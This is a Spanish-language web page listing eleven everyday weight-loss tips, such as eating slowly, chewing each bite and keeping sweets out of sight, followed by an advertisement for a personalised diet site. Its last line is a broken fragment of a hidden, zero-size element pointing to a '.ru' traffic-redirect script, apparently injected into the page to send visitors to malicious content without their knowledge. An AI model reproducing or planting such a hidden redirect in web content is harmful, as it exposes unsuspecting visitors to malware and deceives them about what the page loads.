Consejos para bajar de peso
Para muchos el seguir un régimen dietético estricto representa un verdadero problema; a veces con hacer pequeños cambios podemos obtener mejores resultados.
1) Vaya a comprar comida con el estómago lleno.
2) Lleve al mercado una cantidad limitada de dinero y una lista de lo que necesita comprar. Generalmente los alimentos que contienen muchas calorías son más caros por el proceso de refinación y empaque.
3) No coma directamente de los envases, puede pensar que está comiendo poco, cuando está comiendo mucho más de una porción medida.
4) Coma lentamente. Ponga su tenedor en la mesa después de cada bocado. Cuanto más lento coma, más pronto se sentirá satisfecho.
5) Mastique cada bocado por lo menos 10 veces a fin de realmente saborearlo y permitir que su organismo alcance la sensación de saciedad antes de haber comido demasiado.
6) No permanezca alrededor de la mesa, retírese tan pronto haya terminado de comer.
7) No coma todo lo que esté servido en su plato, acostúmbrese a dejar un poco para reforzar su voluntad.
8) No se salte comidas, ya que en la próxima comerá más.
9) Aleje de su vista los alimentos prohibidos, regale las barras de chocolate que guarda en el cajón y quite el frasco de nueces de la sala.
10) Invite a la persona que vive con usted a preparar los alimentos o recoger y lavar los platos a fin de evitar comer mientras trabaja.
11) Coma solamente a la hora y en los lugares planeados. Diga a sus familiares y amigos sus propósitos para bajar de peso, para que lo apoyen.
Solicita tu Dieta Personalizada en www.dietasalamedida.com
emohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none">